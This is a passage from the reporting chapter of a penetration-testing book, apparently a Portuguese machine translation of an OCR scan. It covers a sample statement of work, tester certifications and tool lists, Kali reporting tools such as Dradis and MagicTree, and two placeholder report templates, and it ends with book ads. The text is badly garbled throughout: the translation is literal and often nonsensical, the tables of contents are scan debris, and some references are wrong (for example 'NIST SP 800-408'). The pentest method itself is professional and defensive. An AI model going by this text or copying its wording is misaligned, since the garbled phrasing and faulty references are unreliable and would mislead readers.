O prestador de serviços tem o prazer de apresentar o cliente com a nossa 

metodologia para a realização de uma avaliação de segurança. O principal objetivo da 
CLIENTE para iniciar este compromisso é o de avaliar o nível atual de risco 

e exposição adequadamente dentro da organização, tendo em vista o foco de desenvolver 
e / ou implementação de soluções que ajudarão a reduzir as ameaças críticas e, finalmente, 
mitigar o risco relevante. 


Em resposta às necessidades do cliente, serviço provedor tem delineado um 

estratégia de avaliação de segurança eficaz, que tem provado ser muito bem sucedido em 
elevar a postura de segurança em muitas organizações similares. Nossa abordagem começa 
com a compreensão dos requisitos de negócio relacionados com a avaliação, 

seguido por um mapeamento detalhado topologia e base-revestimento do existente 
infra-estrutura para ser identificado no escopo. Após a conclusão da descoberta do 
infra-estrutura, começamos uma avaliação de vulnerabilidade sistemática de sistemas críticos e 
dispositivos de rede para identificar vetores de ameaças que podem ser de natureza comportamental. 
Um cuidado 

método de exploração é analisada e executada para identificar a relevância da 

vulnerabilidades que foram detectados. Técnicas como a testes de penetração e 

engenharia social pode ser empregado durante esta fase. Por fim, passamos semanal 

briefings de status em todo o ciclo de vida do compromisso de rever as atividades 

para a semana e comunicar metas e objectivos essenciais para as próximas semanas. 

Isso proporciona cliente a oportunidade de informar os nossos engenheiros de qualquer sistema 
atualizações em andamento que necessitam de atenção especial. PRESTADOR DE SERVIÇOS 
fornece conhecimentos de gestão de projectos credíveis para garantir a excelência operacional e 
uma experiência superior ao cliente em todos os nossos compromissos e este não é excepção. 


SERVIÇO DE FORNECEDOR reconhece uma necessidade de negócio consistente para avaliar e 
melhorar o 

postura de segurança de uma organização continuamente, e acreditamos que este compromisso 
vai ajudar na redução de despesas operacionais de riscos minimizados e tempo de inatividade, 
enquanto 

também fornecendo proteção de dados e de marcas de reputação benefícios para o Cliente. 
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Além disso, o conhecimento adquirido a partir de tal exercício é fundamental no planejamento para 
serviços futuros que permitirão a realização de negócios e rentabilidade. Esses benefícios 
sejam coerentes e bem alinhado com os objetivos do cliente listado como segue: 


e Obter uma melhor compreensão de potenciais vulnerabilidades da rede CLIENTE 
e riscos de segurança 


* Determine crítico arquitetura de segurança fraqueza dentro do CLIENTE 
infra-estrutura 


e Avaliar a segurança associado com o site do cliente e 
aplicações de revestimento exterior 


* Relatório de atividades: Um relatório de todas as façanhas executadas (disponível 
em três 


níveis de detalhe). - : ; 
e Hospedar relatório: Informações de host detalhada, incluindo o numero de 


computadores comprometidos, o número médio de vulnerabilidades 
explorados em cada computador, e os nomes CVE de vulnerabilidades 
encontrado em cada um dos computadores. 


* Relatório de vulnerabilidade: Um relatório detalhado de explorar com êxito, contra 
potenciais vulnerabilidades em cada computador. 


e Do lado do cliente Relatório de teste de penetração: A trilha de auditoria completa de 
cada lado do cliente 
Teste de Invasão, incluindo o modelo de e-mail enviado, explorar lançado, 
resultados dos testes (sucesso ou falha), e detalhes sobre sistemas comprometidos. 
* Relatório de usuário: Um relatório de teste do lado do cliente dos quais links foram 
clicados, quando 
eles foram clicados, e por quem. 


Teste de Invasão Externa 


Uma atenção especial deve ser dada ao Teste de Invasão do externo 

fontes. Um SOW Teste de Invasão externo identifica seu alvo e possível 

passos que você está disposto a tomar durante o seu ataque. A DT também define quando você 
vai parar de teste ou que circunstâncias estão fora do escopo. Em outras palavras, a porca 
dá-lhe um ponto de parada. 


O próximo exemplo mostra um resumo Teste de Invasão externa. Ele inclui um 
visão geral do processo de teste, seguido de um esboço com o passo-a-passo 
Instruções de trabalho que será realizada. Este exemplo também descreve o 
cliente ea responsabilidade do proprietário do aplicativo. 


Teste web externo exemplo SOW: 
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O objetivo central do nosso esforço externo e Teste de Invasão web é explorar 

os pontos fracos do perímetro da rede, domínio web, web e de segurança inerentes 
entrega de aplicativos. Elementos de entrega de aplicativos adjacentes, incluindo back-end 
bancos de dados e middleware, também estão incluídos neste domínio e são avaliados 
bem. As vulnerabilidades comuns e exploits que concentrar-se durante esta fase 

são os relacionados a buffer overflows, injeções de SQL e cross-site scripting. 

Nossos engenheiros também podem envolver-se em um manual de navegação do domínio web 
para 

extrair outras peças de dados confidenciais e críticos. Além disso, conforme solicitado pelo 
CLIENTE, dispositivos na DMZ também será incluída neste Teste de Invasão 

exercício de uma tentativa de romper logicamente as defesas em torno da web 

domínio de aplicação. 


Procedimentos de teste detalhadas: 


PRESTADOR DE SERVIÇOS irá completar os seguintes procedimentos de teste para a web 
domínio de aplicação: 


e Identificar os servidores a serem testados, com base no site do cliente e rastreamento 
um site para endereços colheita publicado no site. 
Alavancar os principais motores de busca para localizar endereços para um determinado 
domínio. 
Localizar endereços em PGP e WHOIS bancos de dados. 
Lançamento de vários ataques simultâneos, para acelerar o Teste de Invasão 
processo. 
Interaja com máquinas comprometidas através de agentes discretos que estão instalados 
* apenas na memória do sistema. 
Execute exploits locais para atacar máquinas internamente, em vez de através do 
rede. 
Analisar aplicações fora-de-the-box web para costume, e 
falhas de segurança. 
e Validar exposições de segurança usando exploits geradas dinamicamente, emulando 

um hacker tentando vários caminhos e métodos de ataque. 

Demonstrar as consequências de um ataque através da interação com o servidor web 
° sistemas e bases de dados através de shells de comando e consoles de banco de dados de 
arquivo. 
Realizar testes de penetração sem corromper aplicações web ou em execução 
código em servidores de destino. 


Responsabilidades do cliente são os seguintes: 


e Identificar o domínio web para o qual a avaliação web será executada. 
Comunique-se a manutenção do serviço e / ou impactos durante testes de penetração. 


e Garantir a acessibilidade da web para domínios e dispositivos de perímetro de alcance 
se não 
disponíveis ao público. 
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Material adicional SOW 


Outras áreas a considerar quando se escreve um escopo de trabalho deve ser considerada. Alguns 
o conteúdo comum recomendado para incluir são os seguintes: 


e Liberação Legal e testes: Geralmente isso é pré-aprovado palavreado dos advogados 
excluindo-se os proprietários de aplicativos de realizar o prestador de serviço responsável por 
quaisquer danos causados pelo teste de penetração. 


* Metodologia e abordagem: Isto é como você pretende conduzir a penetração 
Test (regras de engajamento), como o cliente recebe atualizações, cronogramas, 
e como o cliente pode fornecer entrada. O diagrama a seguir fornece uma 
exemplo de uma metodologia SOW: 


Cartografia 
e 
Descoberta 


Linha de Bas 


é Políticas de Segurança 
Auditoria e Segurança Normas W Avaliar e 


Avaliar . fraquezas Remediação VÁ Educar 
o e F 
Melhores Práticas 


Lockdown 
e 
Proteger 


e Preço: Quanto tempo o trabalho necessário para concluir e quanto ele vai custar. 
Isso pode ser dividido em fases de projeto e deve incluir notação 
horas quando esperados potencialmente poderia exceder preço projetado. 


* As expectativas e responsabilidades: O que o prestador de serviços eo cliente 
são atribuídos durante o ciclo de vida do projeto. Deve haver notações quando 
passos necessários por qualquer prestador de serviços ou cliente é um pré-requisito para a 
futuro etapa do projeto. 
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e  Credenciais e ferramentas: Normalmente, os clientes verificar as credenciais detidos pelo 
pessoal a realização de auditorias, bem como quais as ferramentas pode ser usada para 


completar 


tarefas. O fornecimento dessas informações em uma DT acrescenta um grau de 


credibilidade 


e profissionalismo. Fornecer o potencial inicial conjunto de ferramentas também reduz 
a probabilidade de que o cliente tenha uma reação negativa quando um negativo 


impacto ocorre devido ao uso de uma ferramenta. 


Certificações e Credentials 


ISC2 Certified Information Security Professional (CISSP) 
International Council of E-Commerce Consultants (CEH) 
Information Systems Audit and Control Association (ISACA) 
Informações Certified Systems Auditor (CISA) 

RSA Authentication v8.0 Gerente 

RSA DLP Suíte Certified Systems Engineer (CSE) 

RSA SecurID Escolha / Produtos 


Cisco Certified Internetwork Expert (CCIE-RS, Seguranga, Voz, 
Armazenamento, SP) 


SAINT Certified Engineers 

Qualys Certified Engineers 

Projeto sem fio Cisco Avangado Especialista 
Project Management Professional do PMI (PMP) 
Especialista Cisco Avançado Campo de Segurança 
Especialista Cisco Avançado Campo sem fio 


Cisco Mestre Segurança parceiro especializado 


O exemplo a seguir mostra uma tabela que destaca uma amostra de Penetração Rester 
perícia, juntamente com as ferramentas que serão utilizadas: 


Testando Ferramentas 
Kali Linix 
Backtrack 5 RC3 
AirSnort 
AirCrack 
Airsnarf 
AirMagnet 
Impacto Núcleo 
Santo 

Rápido 7 

Qualys 
Metasploit 
Paliçada 

eEye Retina 


Ameaça Guarda 


É importante abordar as preocupações que você acredita que podem surgir adiantado. 


Nosso 
ax colega e amigo Willie Rademaker tem uma frase célebre: "Sempre 
V> jogue o peixe na mesa ". Em outras palavras, evitar ter surpresas quando 


um projeto está sendo escopo. Se você acredita que pode haver um ponto de 
contenção, abordá-la na cabeça. Surpresas são para aniversários ... não de negócios. 
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Kali ferramentas de 


ré latórnioigma pequena seleção de ferramentas que podem ser usadas para a comunicação 
organizar como uma equipe de captura da informação, bem como alguns utilitários de criptografia. 
Aqui está um breve resumo de algumas das ferramentas que poderiam beneficiar a sua 
penetração 

prática de teste. 


Dradis 


Dradis é um framework open source para compartilhamento de informações. Dradis fornece um 
repositório centralizado de informações para acompanhar o que foi feito e 

ainda precisa ser concluída. Dradis pode coletar informações de membros da equipe, 

fornecer ferramentas como o Nessus e Qualis, bem como a importação de informações, tais como 
listas de vulnerabilidade. 


Para abrir Dradis, navegue até Ferramentas de Relatórios [Documentação e selecione Dradis. 
Dradis é acessado através de um navegador de Internet padrão, simplificando a colaboração 
entre grupos de pessoas. Para iniciar uma sessão, selecione Novo projeto para o Meta-Servidor 
e fornecer uma senha que será compartilhado entre os membros da equipe. 


Server password 


This server does not have a password yet, please set up one 


Password 


Confirm Password ess +, 


|! 


Meta-Server 
You can create a new project or checkout one from the Meta-Server 
New project @ 
Checkout project 


initialize 


Para iniciar sessão, crie um nome e fornecer uma senha. Isso vai colocá-lo no principal 
dashboard. Confira os assistentes e vídeos de demonstração para aprender mais sobre como 
usar 

Dradis em seus serviços. 
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KeepNote 


KeepNote é um aplicativo de anotações. Você pode armazenar muitos tipos de notas e 
rapidamente 

ver tudo usando uma hierarquia de notebook com texto rico e formatação de imagem. 
KeepNote pode ser encontrado em Ferramentas de Relatórios [Documentação e selecionando 


KeepNote. 


Maltego CaseFile 


CaseFile é uma aplicação de inteligência visual usado para determinar as relações e 
mundo real liga entre centenas de diferentes tipos de informação. Isto faz 
coleta de informações e análise de relacionamentos fáceis para as investigações. 


Manage Organize 


<a ll Uri 


AM @ Delete | Find | Selection Ad" 


i MX Record = 
A DHS reed ex 


be Ns sendo = 
A DIG name sed Og Detail View 


2 posiata = 


tut Murie ean 
sitamet Aut John Doe mates nta es 
E o , Hydrogen 


MagicTree 


MagicTree é uma ferramenta de produtividade Tester Penetração projetados para consolidação de 
dados, 

consulta, a execução do comando externo e geração de relatórios. A informação é armazenada 

em uma estrutura de árvore, tornando mais fácil para identificar os resultados de exercícios anteriores 
e 

formato para fins de relatório. 
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CutyCapt 


CutyCapt é usado para capturar a página web de renderização do Webkit em uma variedade de 
bitmap 
e formatos vetoriais que incluem SVG, PDF, PS, PNG, JPEG, TIFF, BMP e GIF. 


Exemplos de relatórios 


A seguir, exemplo relatórios que você pode usar como modelos para as entregas de construção para 
seus clientes: 


Reportar testes de penetração para o cliente do PRESTADOR DE SERVIÇOS: 


Este documento contém informações de provedor de serviço que é 

confidenciais e privilegiadas. A informação é destinado para o privado 

uso de CLIENTE. Ao aceitar este documento, você concorda em manter o 
conteúdos em confiança e não copiar, divulgar ou distribuir este sem 

confirmação pedido por escrito para e por escrito do PRESTADOR DE SERVIÇOS. 
Se você não for o destinatário pretendido, estar ciente de que qualquer divulgação, 
cópia ou distribuição do conteúdo deste documento é proibida. 


Detalhes do documento: 

Empresa: CLIENTE 

Documento: Relatório de Teste de Invasão 
Data: 

Classificação: Público 

Destinatário: Empresa, nome, título 
História de Documento: 

Data: Versão, autor, comentários 


1.0 Projecto 


2.0 Review 

Conteúdo: 

1 Sumatio-EXECUIVO sasesana a sd ees e 4 
RESUMO a O EEA 4 
pe E RR ADOIG Age serenas sc ORNE a AEE 4 


Capítulo 8 
Nise ESCODO A E acted’ E E dad 5 
Ted Principals CONCIUS OCS amassen ae a ao ana AG teen valde aAa 6 
1.3.1 Vulnerabilidade A qu ae si CU Aa ei he lsd 6 
1.3.2 Vulnerabilidade B a SO a ee Ra a aN 6 
1.3.3 Vulnerabilidade C. ic tesseeuie- Geocoin cesececetacese eet aceite teehee detec 7 
1.4 Recomendações ...2..... eee eeeeeeeeeeeeeeeeeeeeeeeeeseneeeeeee esa 8 
1.5 RESUMO ..nssssssnonnnneoseeenennrrerrtrnnretttenrtese pteekia eto ten hates 10 
2: Relatório TECMICO: ionnan ae ae AEE a 12 
21A segurança da rederien aea Aaaa 12 
2 DESO Temaet a e a a tan a e er eaa 12 
DVD ITEM 2ra reta add aba E Er nates 14 
2.2 vulnerabilidades em aplicações Web .................... 16 
SG ONCIUISÃO sansan air mi ai a her 21 
Apêndice santas eth ra his Calta a el A al E ae 22 
Sumario Executivo 
1.1 Sumario 


CLIENTE atribuiu a tarefa de realizar testes de penetração de Quarterly 
<domínio>, ao PRESTADOR DE SERVIÇOS. 


Este teste de penetração foi realizada durante <Date>. O relatório detalhado sobre cada 
tarefa e nossos resultados são descritos a seguir. 


O objetivo do teste é determinar as vulnerabilidades de segurança nas configurações 

e aplicações web em execução nos servidores especificados como parte do escopo do trabalho. 
Os testes são realizados assumindo a identidade de um atacante ou um usuário com malicioso 
intenção. 


1.1.1 Abordagem 


* Realizar exames gerais para identificar potenciais áreas de exposição e serviços que 
podem agir como pontos de entrada. 


e Realizar exames e investigações para validar vulnerabilidades encontradas alvo 
dos alvos identificados durante as verificações gerais. 
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* Teste de componentes identificados para obter acesso. 
e Identificar e validar vulnerabilidades. 
e Classificação vulnerabilidades com base no nivel de ameaça, o potencial de perda e 
probabilidade de 
exploração. 
Realizar atividades de pesquisa e desenvolvimento para apoiar a análise. Identificar 
questões de consequência imediata e recomendar soluções. 
Fornecer recomendações para melhorar a segurança. 
e | Transferência de conhecimento. 


Durante as verificações de segurança de nível de rede, buscou-se investigar as portas apresentar 
em 

vários servidores e detectar serviços em execução com as falhas de segurança existentes, se 
houver. 

No nível do aplicativo web, fizemos o check-configuração dos servidores web 'e lógica 


FTEPE NA BEOPrIO aplicativo web. 

O escopo deste Penetration Test foi limitado aos seguintes endereços IP. 
<endereco IP list> 

<endereço IP list> 

<endereço IP list> 

1.3 Principais conclusões 


Esta seção apresenta um resumo das questões críticas descobertos durante a 
Engajamento Teste de Invasão. 


1.3.1 Vulnerabilidade A 

Explicação de vulnerabilidade encontrada. 
Recomendação para corrigir vulnerabilidade. 
1.3.2 Vulnerabilidade B 

Explicação de vulnerabilidade encontrada. 
Recomendação para corrigir vulnerabilidade. 
1.3.3 Vulnerabilidade C 

Explicação de vulnerabilidade encontrada. 
Recomendação para corrigir vulnerabilidade. 
1.4 Recomendações 
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PRESTADOR DE SERVIÇOS AO CLIENTE recomenda desenvolver um plano de ação para o 
endereço 

problemas descobertos durante esta avaliação. 

As recomendações deste relatório são classificados como tático ou estratégico. Tático 
recomendações são correções de curto prazo para ajudar a elevar a segurança imediata 
preocupações. Recomendações estratégicas concentrar no ambiente global, o futuro 
direções, e introdução de melhores práticas de segurança. Um dos destaques do 
recomendações segue: 


1.4.1 Recomendações táticos 


Recomendação 1 
Recomendação 2 
Recomendação 3 
Recomendação 4 


Recomendação 5 


1.4.2 Recomendações Estratégicas 


As avaliações de segurança pró-ativa: Como parte das melhores práticas de segurança; 
O CLIENTE deverá assegurar que quaisquer mudanças importantes para a sua Internet 
de frente para a infra-estrutura tem outra avaliação de segurança externa. Este é um 
precaução ao impacto de alterações feitas conforme recomendado a partir desta 
documento. 


Intrusion Detection / Prevention (IDS / IPS): Redes expostas ao 
tráfego potencialmente hostil deve implementar alguma capacidade de detectar 
intrusões. Investigar uma solução IDS para a rede. 


Automatizado de controle de acesso de rede: A melhor prática é automatizar o controle de 
quem eo que é permitido o acesso à rede específica. 


1.5 Resumo tabular 


A tabela a seguir resume Avaliação da Vulnerabilidade do Sistema: 


Categoria Descrição 
Resumo da avaliação de vulnerabilidade de Sistemas 
Número de Hosts ao vivo 100 
Número de Vulnerabilidades 35 


Alta, média e informações gravidade 


vulnerabilidades 21 68 
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2.1 Segurança de Rede 

2.1.1 ITEM 1 

Descrição: 

Duração Serviço: SMTP, HTTP, POP3, HTTPS 
Serviço Detalhes Versão: 

Análise 

Descrição 

Nível de Gravidade 

Médio 

2.1.2 ITEM 2 

REPEAT 

Descrição sumária 

Referências: http://www .weblink.com 


2.2 vulnerabilidades em aplicações Web 


D FED AE Ameaça Potencial 
escriçao dos rIScoS Nível] Perda Corporativo 


Vulnerabilidade A Grave Perda potencial 


Vulnerabilidade B Grave Perda potencial 
Vulnerabilidade C Grave Perda potencial 
Vulnerabilidade D Moderado Perda potencial 
Vulnerabilidade E Moderado Perda potencial 
Vulnerabilidade F Baixo Perda potencial 
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Probabilidade de 
Exploração 


Possibilidade de ser 
comprometida 


Possibilidade de ser 
comprometida 


Possibilidade de ser 
comprometida 


Possibilidade de ser 
comprometida 


Possibilidade de ser 
comprometida 


Possibilidade de ser 
comprometida 


Recomendação 


Remediação 


Remediação 


Remediação 


Remediação 


Remediação 


Remediação 


D ic HOS A Ameaça Potencial 
escriçao dos rISCOS Nível Perda Corporativo 

Vulnerabilidade G Baixo Perda potencial 

Vulnerabilidade H Baixo Perda potencial 
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Probabilidade de 


Exploração Recomendação 
Possibilidade de ser R diced 
comprometida emediação 
Possibilidade de ser = 
Remediação 


comprometida 


A experiência tem mostrado que um esforço concentrado para resolver os problemas descritos nesta 
relatório pode resultar em melhorias de segurança dramáticas. A maioria dos problemas identificados 
exigem o conhecimento e compromisso com as boas práticas em vez de alto nível 


skillsets técnicos. 


Apêndice 


Esta seção fornece as imagens das vulnerabilidades conhecidas apresentados no 


observações e descobertas mesa. 


Relatório de teste de penetração 
Cliente: 

Endereço 

Informações para contato 
Provedor de serviços: 

Endereço 


Informações para contato 


RELATÓRIO DE TESTE DE PENETRAÇÃO - Customer 


Índice analítico 

Sumário Executivo 

Resumo dos resultados 

Narrativa de Ataque 

Avaliação de Vulnerabilidade de rede 
Avaliação Webserver Vulnerabilidade 
Privilege Escalation 


Mantendo o acesso a Alvos comprometidos 
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Privilege Escalation Domínio 

Exploração conteúdo do banco de dados 

Atacante Controle de Operações de Clientes 

Conclusão 

Recomendações 

Classificação de 

Risco 

Apêndice A: Vulnerabilidade Detalhe e Mitigação 

Vulnerabilidade A 

Vulnerabilidade B 

Vulnerabilidade C 

Vulnerabilidade D 

Apêndice B: Lista de alterações feitas aos Sistemas Archmake 
Apêndice C: Sobre Offensive Security 

Sumario Executivo 

PRESTADOR DE SERVIÇOS foi contratada para realizar um teste de penetração contra 
Presença na web externo do cliente. A avaliação foi realizada de forma 


que simulava um ator malicioso envolvido em um ataque direcionado contra a empresa 
com os objetivos da seguinte forma: 


e Identificar se um atacante remoto pode penetrar as defesas do CLIENTE 
* Determinar o impacto de uma falha de segurança em: 
° A integridade de segurança da empresa 
° A confidencialidade das informações da empresa 
° A infra-estrutura interna e disponibilidade dos clientes da 
sistemas de informação 


Os resultados desta avaliação serão utilizados pelo Cliente para orientar as decisões futuras 
quanto à direção de seu programa de segurança da informação. Todos os testes e ações foram 
conduzida sob condições controladas. 


Resumo dos resultados 
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Reconnaissance Rede foi realizado contra o espaço de endereço fornecido pelo 
CLIENTE com o entendimento de que esta gama de alvos seria considerado 

o escopo para este compromisso. Determinou-se que a empresa mantém 

presença externa mínima, consistindo em um site externo e outros serviços 
identificado pelo PRESTADOR DE SERVIÇOS durante Reconnaissance de CLIENTE. 


Ao rever a segurança do site principal cliente, descobriu-se 

que um plugin vulnerável foi instalado. Este plugin foi explorada com sucesso, 

levando ao acesso administrativo. Este acesso foi utilizada para obter acesso interativo 

para o sistema operacional subjacente, e, em seguida, encaminhado para privilégios de root. 


PRESTADOR DE SERVIÇOS foi capaz de usar o acesso administrativo foi identificar interno 
recursos de rede. A vulnerabilidade em um sistema interno foi aproveitado para ganhar locais 
acesso ao sistema, que foi então escalado para direitos de administrador de domínio. Isto colocou 
toda a infra-estrutura da rede sob o controle dos atacantes. 


Narrativa de Ataque 

<Network Vulnerability Assessment Details> 

<webserver Vulnerability Assessment Details> 

<Privilege Escalation Details> 

<Maintaining Acesso ao Alvos comprometidos Details> 

<domain Escalation Privilege Details> 

<Database Conteúdo Exploração Details> 

Conclusão 

No decorrer do teste de penetração externa, CLIENTE sofreu uma cascata 


série de violações que levaram a condições que prejudicam diretamente a empresa como 
bem como os seus clientes. 


Os objetivos específicos do teste de penetração foram demonstrados como 
segue: 
e Identificar se é possível a um atacante remoto para penetrar cibernético do CLIENTE 
defesas 


* Determinar o impacto de uma falha de segurança em: 
° A integridade dos sistemas da empresa. 
°  Aconfidencialidade das informações dos clientes da empresa. 


° A infra-estrutura interna e disponibilidade das informações do cliente 
sistemas. 
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Baseado serviços fornecidos, foi determinado que um invasor remoto seria capaz 

para penetrar as defesas do cliente. O vector invasor inicial é identificado como crítico, 
porque pode ser descoberto remotamente através de varrimento automatizado. O impacto de 
explorar tais vulnerabilidades podem paralisar rede do cliente e marca. 


Recomendações 


Louvamos ao cliente para ser pró-ativo na gestão de risco de tecnologia e 

segurança da rede por meio de aquisição de nossos serviços. Devido ao impacto da geral 
organização como descoberto por este teste de penetração, os recursos adequados 

recomendado para ser alocado para assegurar que os esforços de remediação são realizadas em 
tempo hábil. Enquanto uma lista abrangente de itens que devem ser implementadas 

está para além do âmbito do presente compromisso, alguns itens de alto nível são importantes para 
citar: 


e | Implementar um programa de gerenciamento de patch: Muitas das vulnerabilidades 
identificadas 
poderiam ser evitados com o gerenciamento de patches adequada. Recomendamos seguinte 
as orientações descritas no NIST SP 800-408 como uma fonte para o desenvolvimento de 
políticas de segurança para gerenciamento de patches adequada. Isto irá reduzir o risco de 
execução de sistemas vulneráveis. 


e Impor controle de mudanças em todos os sistemas: As vulnerabilidades comuns são 
causado por erro humano. Muitos problemas de configuração incorreta poderia ser 
evitado 


através de uma mudança forte e processo de controlo em todos os sistemas activos. 
e  Multifatorial Alavancagem e controle de acesso baseado em função: Alguns sistemas 


críticos 
Foram encontrados alavancando a segurança da senha como os únicos meios de validar 
pessoas autorizadas. A melhor prática é ter, pelo menos, duas formas de 
autenticação, juntamente com a limitação do acesso conta de administração. 

e Restringir o acesso a sistemas críticos: Sistemas críticos devem ser isolados a partir de 
outros sistemas usando listas brancas, ACLs, VLANS, e outros meios. O projeto 
conceito de privilégio mínimo vai limitar a quantidade de dano que um atacante pode 
provocado usando um recurso comprometida. Consulte NIST SP 800-27 RevA11 para 
orientações sobre a obtenção de uma linha de base de segurança para sistemas de TI. 


Classificação de 

Risco 

O risco global identificado pelo provedor de serviço para o cliente é dividido 

entre crítica e Baixo, definida da seguinte forma. PRESTADOR DE SERVIÇOS identificado 
três vulnerabilidades críticas que foram usados para obter acesso aos clientes da interna 
rede. 


e Crítico: Ameaça imediata para os processos-chave de negócios 


e Alta: Ameaça indireta a chave processos de negócio / ameaça de negócio secundário 
processos 
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e Meio: Indireta ameaça / parcial aos processos de negócio 


e Baixa: Não existe nenhuma ameaça direta; vulnerabilidade pode ser alavanca com 
outro 
vulnerabilidades 
O nível de risco atual de sistemas testados, com base no nível de risco mais elevado de resultados 
em sistemas é crítico durante os testes, um total de três (3) Crítica, dois (2) Médio, 
e dois (2) foram identificados baixos vulnerabilidades. 


Apêndice: Vulnerabilidade Detalhe com Mitigação 


<Vulnerability A information> 


Resumo 


Este capítulo conclui este livro, fornecendo orientações para o desenvolvimento profissional 
prestação de serviços ao cliente relatórios de testes pós-penetração. Invadir 

sistemas e outras mãos sobre o trabalho técnico é divertido, no entanto, relatórios detalhados e 
práticas comerciais sólidas pagar as contas. O que torna uma prática de serviços profissionais 
sucesso é a capacidade de se tornar um conselheiro de confiança para o seu campo relacionado. 
Para 

requisitos de segurança, isso significa ajudar os clientes a atender às normas de conformidade, 
reduzir o risco de vulnerabilidades e melhorar a forma de identificar ameaças. 


O primeiro tema abordado foi o cumprimento, porque esse é um método comum para mostrar 

valor para a aquisição de serviços. Encontramos os clientes a encontrar orçamento, quando houver 
risco 

de não cumprir um mandato ou reagir a um incidente recente, para saber mais 

padrões populares irá melhorar a sua capacidade de importar para seus clientes. Em seguida, nós 
olhou para os diferentes métodos de projeto de lei para os serviços, bem como algumas coisas a 
olhar para fora 

sobre citando para um projeto. Depois disso, quebrou os diferentes componentes 

de um documento entrega prestação de melhores práticas para a prestação de resultados para o seu 
clientes. Nós adicionamos uma seção final que cobria algumas ferramentas de relatórios disponíveis 


em 
Kali Hare snort a dps re IREI O BOSSA RAS MREGA APS GHEANGS- web 


Objetivos do teste de penetração. Obrigado pela leitura. 
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1. Aprenda a realizar testes de penetração com 
BackTrack 5 


BackTrack 5 Cookbook 2. Cerca de 100 receitas projetadas para ensinar 
princípios de teste de penetração e de construção 


conhecimento do BackTrack 5 Ferramentas 


3. Fornece instruções passo-a-passo sobre 
o uso de muitos dos BackTrack do popular e 
ferramentas não tão populares 


Por favor, verifique www.PacktPub.com para obter informações sobre nossos 


títulos 
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BackTrack 5 Wireless 
Penetration Testing 


Metasploit Penetration 
Testing Cookbook 


BackTrack 5 Penetração sem fio 
Guia do Testing Beginner 


ISBN: 978-1-84951-558-0 Paperback: 220 páginas 


Mestre borda do sangramento técnicas de teste com witeless 
BackTrack 5 


1. Saiba Teste de Invasão sem fio com o 
versão mais recente do Backtrack 


2. O primeiro e único livro que aborda sem fio 
testes com BackTrack 


3. Conceitos explicados com o passo-a-passo prático 
sessões e ilustrações ricas 


4. Escrito por Vivek Ramachandran + - mundo 
pesquisa de segurança de renome e evangelista, e 
descobridor do wireless "Caffe Latte Attack" 


Metasploit Teste de Invasão 
Livro de receitas 


ISBN: 978-1-84951-742-3 Paperback: 268 páginas 


Mais de 70 receitas para dominar o mais utilizado 
framework de testes de penetração 


1. Mais de 80 receitas / practicaltasks que vai 
aumentar o conhecimento do leitor a partir de iniciante 
a um nível avançado 


2. Foco especial sobre os mais recentes sistemas operacionais, 
exploits, e técnicas de teste de penetração 


3. A análise detalhada de ferramentas de terceiros com base 
na estrutura Metasploit para melhorar o 
experiência em testes de penetração 


Por favor, verifique www.PacktPub.com para obter informações sobre nossos 


títulos 
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Quer mais 
Livros? 


Nós esperamos que você aprendeu o que você esperava de aprende 
com 

este e-book. Encontrar tais livros mais Úteis sobre 
www.PlentyofeBooks.net 


Saiba mais e fazer seus pais orgulhosos :) 


Saudações 
www.PlentyofeBooks.net 


